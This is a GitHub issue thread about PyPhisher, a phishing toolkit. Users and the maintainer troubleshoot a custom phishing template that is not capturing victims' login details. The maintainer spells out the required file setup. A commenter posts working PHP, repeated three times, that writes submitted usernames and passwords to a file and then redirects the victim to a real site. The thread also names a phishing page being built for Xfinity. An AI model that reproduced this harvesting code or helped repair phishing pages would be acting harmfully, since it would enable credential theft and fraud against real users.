### ISSUE TITLE
custom page

### ISSUE THREAD

**Issue by ethical-amaterasu** [KasRoudra/PyPhisher#60]
Hi bro, I acknowledge your hard work and talent on this masterpiece you have my respect! Just a slight issue Ive come across lately which is when I try to use the custom option #66 in the main menu then i put my page directory and it provides my links as it should. But after I click the link in the browser and try to fill the login details it doesnt return anything to me in the terminal! It just stays blank and nothing happens even though Ive tried times without number but I cant even identify the issue. Please can you look into it for me.

**Comment by KasRoudra** [comment]
@ethical-amaterasu Thanks! A custom template of phishing should have at least three configurations.
 - `index.php` which will redirect to html
 - `login.php` which will collect data on post request and save data in `usernames.txt`
 - The value of action attribute of your form (in html) should be `login.php`
 
Check if your configuration matches with pyphisher requirement! If following all of these doesn't solve your problem, then you can send me the zipped site via email. I'll check that

**Comment by ethical-amaterasu** [comment]
OK I tried correcting the template files and it looks like its still the same thing. Ill like to send it to you perhaps youll be able to modify it perfectly for me. How can I reach your email

**Comment by KasRoudra** [comment]
@ethical-amaterasu Email me at `kasroudrakrd@gmail.com`

**Comment by ilhan7777** [comment]
I too had the same problem. The problem is probably due to the incompatibility of the login.php file.
Some templates send login information with cookies.

that is, open the login.php file from your site folder. Replace the cookie parts with post.
my code is like this:


<?php

file_put_contents("usernames.txt", "example site username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://99designs.com/');
exit();
?>

**Comment by ilhan7777** [comment]
<?php

file_put_contents("usernames.txt", "example site username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://99designs.com/');
exit();
?>

**Comment by ilhan7777** [comment]
`
<?php

file_put_contents("usernames.txt", "example site username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://99designs.com/');
exit();
?>
`

**Comment by ilhan7777** [comment]
[login.zip](https://github.com/KasRoudra/PyPhisher/files/8765144/login.zip)

**Comment by ethical-amaterasu** [comment]
@ilhan7777 you mean I should convert the php file to zip?

**Comment by ethical-amaterasu** [comment]
@KasRoudra I just uploaded the file to megafile.cc site and I shared the link to your email please check spam folder. Thank you

**Comment by ilhan7777** [comment]
> @ilhan7777 you mean I should convert the php file to zip?

no. just import login.php file and replace with yours.

**Comment by ilhan7777** [comment]
did you paste it to your site folder and replace it?

**Comment by KasRoudra** [comment]
@ilhan7777 He is trying to make a phishing page of  [xfinity](https://login.xfinity.com/login). Here is so far he've tried [website.zip](https://megafile.cc/O0yg/comcast2020.zip)
